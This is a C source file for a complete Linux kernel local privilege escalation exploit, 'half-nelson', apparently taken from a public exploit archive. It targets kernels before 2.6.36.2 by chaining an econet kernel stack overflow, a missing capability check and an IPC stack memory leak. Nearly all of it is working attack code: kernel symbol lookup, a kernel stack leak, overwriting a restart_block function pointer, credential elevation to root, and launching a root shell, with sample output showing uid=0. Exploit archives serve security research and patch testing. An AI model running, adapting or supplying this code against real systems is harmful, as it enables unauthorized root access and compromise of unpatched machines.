CVE-2010-4073/17787.c

/*
 * half-nelson.c
 *
 * Linux Kernel < 2.6.36.2 Econet Privilege Escalation Exploit
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 * 
 * Information:
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3848
 *
 *   Stack-based buffer overflow in the econet_sendmsg function in 
 *   net/econet/af_econet.c in the Linux kernel before 2.6.36.2, when an 
 *   econet address is configured, allows local users to gain privileges by 
 *   providing a large number of iovec structures.
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3850
 *
 *   The ec_dev_ioctl function in net/econet/af_econet.c in the Linux kernel 
 *   before 2.6.36.2 does not require the CAP_NET_ADMIN capability, which 
 *   allows local users to bypass intended access restrictions and configure 
 *   econet addresses via an SIOCSIFADDR ioctl call.
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4073
 *
 *   The ipc subsystem in the Linux kernel before 2.6.37-rc1 does not 
 *   initialize certain structures, which allows local users to obtain 
 *   potentially sensitive information from kernel stack memory.
 *
 * Usage:
 *
 *   $ gcc half-nelson.c -o half-nelson -lrt
 *   $ ./half-nelson
 *   [+] looking for symbols...
 *   [+] resolved symbol commit_creds to 0xffffffff81088ad0
 *   [+] resolved symbol prepare_kernel_cred to 0xffffffff81088eb0
 *   [+] resolved symbol ia32_sysret to 0xffffffff81046692
 *   [+] spawning children to achieve adjacent kstacks...
 *   [+] found parent kstack at 0xffff88001c6ca000
 *   [+] found adjacent children kstacks at 0xffff88000d10a000 and 0xffff88000d10c000
 *   [+] lower child spawning a helper...
 *   [+] lower child calling compat_sys_wait4 on helper...
 *   [+] helper going to sleep...
 *   [+] upper child triggering stack overflow...
 *   [+] helper woke up
 *   [+] lower child returned from compat_sys_wait4
 *   [+] parent's restart_block has been clobbered
 *   [+] escalating privileges...
 *   [+] launching root shell!
 *   # id
 *   uid=0(root) gid=0(root)
 *
 * Notes:
 *
 *   This exploit leverages three vulnerabilities to escalate privileges. 
 *   The primary vulnerability is a kernel stack overflow, not a stack buffer 
 *   overflow as the CVE description incorrectly states. I believe this is the
 *   first public exploit for a kernel stack overflow, and it turns out to be 
 *   a bit tricky due to some particulars of the econet vulnerability. A full 
 *   breakdown of the exploit is forthcoming.
 *
 *   Tested on Ubuntu 10.04 LTS (2.6.32-21-generic).
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <syscall.h>
#include <inttypes.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/ipc.h>
#include <sys/sem.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/syscall.h>
#include <netinet/in.h>
#include <net/if.h>

#define IOVS           446
#define NPROC          1024
#define KSTACK_SIZE    8192

#define KSTACK_UNINIT  0
#define KSTACK_UPPER   1
#define KSTACK_LOWER   2
#define KSTACK_DIE     3
#define KSTACK_PARENT  4
#define KSTACK_CLOBBER 5

#define LEAK_BASE      0xffff880000000000
#define LEAK_TOP       0xffff8800c0000000
#define LEAK_DEPTH     500
#define LEAK_OFFSET    32 

#define NR_IPC         0x75
#define NR_WAIT4       0x72
#define SEMCTL         0x3

#ifndef PF_ECONET
#define PF_ECONET      19
#endif

#define STACK_OFFSET   6
#define RESTART_OFFSET 40

struct ec_addr {
	unsigned char station;
	unsigned char net;
};

struct sockaddr_ec {
	unsigned short sec_family;
	unsigned char port;
	unsigned char cb;
	unsigned char type;
	struct ec_addr addr;
	unsigned long cookie;
};

struct ipc64_perm {
	uint32_t key;
	uint32_t uid;
	uint32_t gid;
	uint32_t cuid;
	uint32_t cgid;
	uint32_t mode;
	uint16_t seq;
	uint16_t __pad2;
	unsigned long __unused1;
	unsigned long __unused2;
};

struct semid64_ds {
	struct ipc64_perm sem_perm;
	unsigned long sem_otime;
	unsigned long __unused1;
	unsigned long sem_ctime;
	unsigned long __unused;
	unsigned long sem_nsems;
	unsigned long __unused3;
	unsigned long __unused4;
};

union semun {
	int val;
	struct semid_ds *buf;
	unsigned short *array;
	struct seminfo *__buf;
};

struct region {
	unsigned long parent;
	unsigned long addrs[NPROC];
};
struct region *region;

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long ia32_sysret;
 
void __attribute__((regparm(3)))
kernel_code(void)
{
	commit_creds(prepare_kernel_cred(0));
}

void
payload_parent(void)
{
	asm volatile (
		"mov $kernel_code, %rax\n"
		"call *%rax\n"
	);
}

void
payload_child(void)
{
	asm volatile (
		"movq $payload_parent, (%0)\n"
		"jmpq *%1\n"
		:
		: "r"(region->parent + RESTART_OFFSET), "r"(ia32_sysret)
	);
}

unsigned long
get_kstack(void)
{
	int i, size, offset;
	union semun *arg;
	struct semid_ds dummy;
	struct semid64_ds *leaked;
	char *stack_start, *stack_end;
	unsigned char *p;
	unsigned long kstack, *ptr;

	/* make sure our argument is 32-bit accessible */
	arg = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_32BIT, -1, 0);
	if (arg == MAP_FAILED) {
		printf("[-] failure mapping memory, aborting!\n");
		exit(1);
	}

	/* map a fake stack to use during syscall */
	stack_start = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_32BIT, -1, 0);
	if (stack_start == MAP_FAILED) {
		printf("[-] failure mapping memory, aborting!\n");
		exit(1);
	}
	stack_end = stack_start + 4096;

	memset(arg, 0, sizeof(union semun));
	memset(&dummy, 0, sizeof(struct semid_ds));
	arg->buf = &dummy;

	/* syscall(NR_IPC, SEMCTL, 0, 0, IPC_SET, arg) */
	asm volatile (
		"push %%rax\n"
		"push %%rbx\n"
		"push %%rcx\n"
		"push %%rdx\n"
		"push %%rsi\n"
		"push %%rdi\n"
		"movl %0, %%eax\n"
		"movl %1, %%ebx\n"
		"movl %2, %%ecx\n"
		"movl %3, %%edx\n"
		"movl %4, %%esi\n"
		"movq %5, %%rdi\n"
		"movq %%rsp, %%r8\n"
		"movq %6, %%rsp\n"
		"push %%r8\n"
		"int $0x80\n"
		"pop %%r8\n"
		"movq %%r8, %%rsp\n"
		"pop %%rdi\n"
		"pop %%rsi\n"
		"pop %%rdx\n"
		"pop %%rcx\n"
		"pop %%rbx\n"
		"pop %%rax\n"
		:
		: "r"(NR_IPC), "r"(SEMCTL), "r"(0), "r"(0), "r"(IPC_SET), "r"(arg), "r"(stack_end)
		: "memory", "rax", "rbx", "rcx", "rdx", "rsi", "rdi", "r8"
	);

	/* naively extract a pointer to the kstack from the kstack */
	p = stack_end - (sizeof(unsigned long) + sizeof(struct semid64_ds)) + LEAK_OFFSET;
	kstack = *(unsigned long *) p;

	if (kstack < LEAK_BASE || kstack > LEAK_TOP) {
		printf("[-] failed to leak a suitable kstack address, try again!\n");
		exit(1);
	}
	if ((kstack % 0x1000) < (0x1000 - LEAK_DEPTH)) {
		printf("[-] failed to leak a suitable kstack address, try again!\n");
		exit(1);
	}

	kstack = kstack & ~0x1fff;
	
	return kstack;
}

unsigned long
get_symbol(char *name)
{
	FILE *f;
	unsigned long addr;
	char dummy, sym[512];
	int ret = 0;
 
	f = fopen("/proc/kallsyms", "r");
	if (!f) {
		return 0;
	}
 
	while (ret != EOF) {
		ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym);
		if (ret == 0) {
			fscanf(f, "%s\n", sym);
			continue;
		}
		if (!strcmp(name, sym)) {
			printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
			fclose(f);
			return addr;
		}
	}
	fclose(f);
 
	return 0;
}

int
get_adjacent_kstacks(void)
{
	int i, ret, shm, pid, type;

	/* create shared communication channel between parent and its children */
	shm = shm_open("/halfnelson", O_RDWR | O_CREAT, S_IRWXU | S_IRWXG | S_IRWXO);
	if (shm < 0) {
		printf("[-] failed creating shared memory, aborting!\n");
		exit(1);
	}

	ret = ftruncate(shm, sizeof(struct region));
	if (ret != 0) {
		printf("[-] failed resizing shared memory, aborting!\n");
		exit(1);
	}

	region = mmap(NULL, sizeof(struct region), PROT_READ | PROT_WRITE, MAP_SHARED, shm, 0);
	memset(region, KSTACK_UNINIT, sizeof(struct region));

	/* parent kstack self-discovery */
	region->parent = get_kstack();

	printf("[+] found parent kstack at 0x%lx\n", region->parent);

	/* fork and discover children with adjacently-allocated kernel stacks */
	for (i = 0; i < NPROC; ++i) {
		pid = fork();

		if (pid > 0) {
			type = KSTACK_PARENT;
			continue;
		} else if (pid == 0) {
			/* children do kstack self-discovery */
			region->addrs[i] = get_kstack();

			/* children sleep until parent has found adjacent children */
			while (1) {
				sleep(1);
				if (region->addrs[i] == KSTACK_DIE) {
					/* parent doesn't need us :-( */
					exit(0);
				} else if (region->addrs[i] == KSTACK_UPPER) {
					/* we're the upper adjacent process */
					type = KSTACK_UPPER;
					break;
				} else if (region->addrs[i] == KSTACK_LOWER) {
					/* we're the lower adjacent process */
					type = KSTACK_LOWER;
					break;
				}
			}
			break;
		} else {
			printf("[-] fork failed, aborting!\n");
			exit(1);
		}
	}

	return type;
}

void
do_parent(void)
{
	int i, j, upper, lower;

	/* parent sleeps until we've discovered all the child kstacks */
	while (1) {
		sleep(1);
		for (i = 0; i < NPROC; ++i) {
			if (region->addrs[i] == KSTACK_UNINIT) {
				break;
			}
		}
		if (i == NPROC) {
			break;
		}
	}

	/* figure out if we have any adjacent child kstacks */
	for (i = 0; i < NPROC; ++i) {
		for (j = 0; j < NPROC; ++j) {
			if (region->addrs[i] == region->addrs[j] + KSTACK_SIZE) {
				break;
			}
		}
		if (j != NPROC) {
			break;
		}
	}
	if (i == NPROC && j == NPROC) {
		printf("[-] failed to find adjacent kstacks, try again!\n");
		exit(1);
	}

	upper = i;
	lower = j;

	printf("[+] found adjacent children kstacks at 0x%lx and 0x%lx\n", region->addrs[lower], region->addrs[upper]);

	/* signal to non-adjacent children to die */
	for (i = 0; i < NPROC; ++i) {
		if (i != upper && i != lower) {
			region->addrs[i] = KSTACK_DIE;
		}
	}

	/* signal adjacent children to continue on */
	region->addrs[upper] = KSTACK_UPPER;
	region->addrs[lower] = KSTACK_LOWER;

	/* parent sleeps until child has clobbered the fptr */
	while (1) {
		sleep(1);
		if (region->parent == KSTACK_CLOBBER) {
			break;
		}
	}

	printf("[+] escalating privileges...\n");

	/* trigger our clobbered fptr */
	syscall(__NR_restart_syscall);

	/* our privileges should be escalated now */
	if (getuid() != 0) {
		printf("[-] privilege escalation failed, aborting!\n");
		exit(1);
	}

	printf("[+] launching root shell!\n");

	execl("/bin/sh", "/bin/sh", NULL);
}

void
do_child_upper(void)
{
	int i, ret, eco_sock;
	struct sockaddr_ec eco_addr;
	struct msghdr eco_msg;
	struct iovec iovs[IOVS];
	struct ifreq ifr;
	char *target;

	/* calculate payload target, skip prologue */
	target = (char *) payload_child;
	target += 4;
	
	/* give lower child a chance to enter its wait4 call */
	sleep(1);

	/* write some zeros */
	for (i = 0; i < STACK_OFFSET; ++i) {
		iovs[i].iov_base = (void *) 0x0;
		iovs[i].iov_len = 0;
	}

	/* overwrite saved ia32_sysret address on stack */
	iovs[STACK_OFFSET].iov_base = (void *) target;
	iovs[STACK_OFFSET].iov_len = 0x0246;

	/* force abort via EFAULT */
	for (i = STACK_OFFSET + 1; i < IOVS; ++i) {
		iovs[i].iov_base = (void *) 0xffffffff00000000;
		iovs[i].iov_len = 0;
	}

	/* create econet socket */
	eco_sock = socket(PF_ECONET, SOCK_DGRAM, 0);
	if (eco_sock < 0) {
		printf("[-] failed creating econet socket, aborting!\n");
		exit(1);
	}

	memset(&ifr, 0, sizeof(ifr));
	strcpy(ifr.ifr_name, "lo");

	/* trick econet into associated with the loopback */
	ret = ioctl(eco_sock, SIOCSIFADDR, &ifr);
	if (ret != 0) {
		printf("[-] failed setting interface address, aborting!\n");
		exit(1);
	}

	memset(&eco_addr, 0, sizeof(eco_addr));
	memset(&eco_msg, 0, sizeof(eco_msg));
	eco_msg.msg_name = &eco_addr;
	eco_msg.msg_namelen = sizeof(eco_addr);
	eco_msg.msg_flags = 0;
	eco_msg.msg_iov = &iovs[0];
	eco_msg.msg_iovlen = IOVS;

	printf("[+] upper child triggering stack overflow...\n");

	/* trigger the kstack overflow into lower child's kstack */
	ret = sendmsg(eco_sock, &eco_msg, 0);
	if (ret != -1 || errno != EFAULT) {
		printf("[-] sendmsg succeeded unexpectedly, aborting!\n");
		exit(1);
	}

	close(eco_sock);
}

void
do_child_lower(void)
{
	int pid;

	printf("[+] lower child spawning a helper...\n");

	/* fork off a helper to wait4 on */
	pid = fork();
	if (pid == 0) {
		printf("[+] helper going to sleep...\n");
		sleep(5);
		printf("[+] helper woke up\n");
		exit(1);
	}

	printf("[+] lower child calling compat_sys_wait4 on helper...\n");

	/* syscall(NR_WAIT4, pid, 0, 0, 0) */
	asm volatile (
		"push %%rax\n"
		"push %%rbx\n"
		"push %%rcx\n"
		"push %%rdx\n"
		"push %%rsi\n"
		"movl %0, %%eax\n"
		"movl %1, %%ebx\n"
		"movl %2, %%ecx\n"
		"movl %3, %%edx\n"
		"movl %4, %%esi\n"
		"int $0x80\n"
		"pop %%rsi\n"
		"pop %%rdx\n"
		"pop %%rcx\n"
		"pop %%rbx\n"
		"pop %%rax\n"
		:
		: "r"(NR_WAIT4), "r"(pid), "r"(0), "r"(0), "r"(0)
		: "memory", "rax", "rbx", "rcx", "rdx", "rsi"
	);

	printf("[+] lower child returned from compat_sys_wait4\n");

	printf("[+] parent's restart_block has been clobbered\n");

	/* signal parent that our fptr should now be clobbered */
	region->parent = KSTACK_CLOBBER;
}

int
main(int argc, char **argv)
{
	int type;

	if (sizeof(unsigned long) != 8) {
		printf("[-] x86_64 only, sorry!\n");
		exit(1);
	}

	printf("[+] looking for symbols...\n");
 
	commit_creds = (_commit_creds) get_symbol("commit_creds");
	if (!commit_creds) {
		printf("[-] symbol table not available, aborting!\n");
		exit(1);
	}
 
	prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
	if (!prepare_kernel_cred) {
		printf("[-] symbol table not available, aborting!\n");
		exit(1);
	}

	ia32_sysret = get_symbol("ia32_sysret");
	if (!ia32_sysret) {
		printf("[-] symbol table not available, aborting!\n");
		exit(1);
	}

	printf("[+] spawning children to achieve adjacent kstacks...\n");

	type = get_adjacent_kstacks();

	if (type == KSTACK_PARENT) {
		do_parent();
	} else if (type == KSTACK_UPPER) {
		do_child_upper();
	} else if (type == KSTACK_LOWER) {
		do_child_lower();
	}

	return 0;
}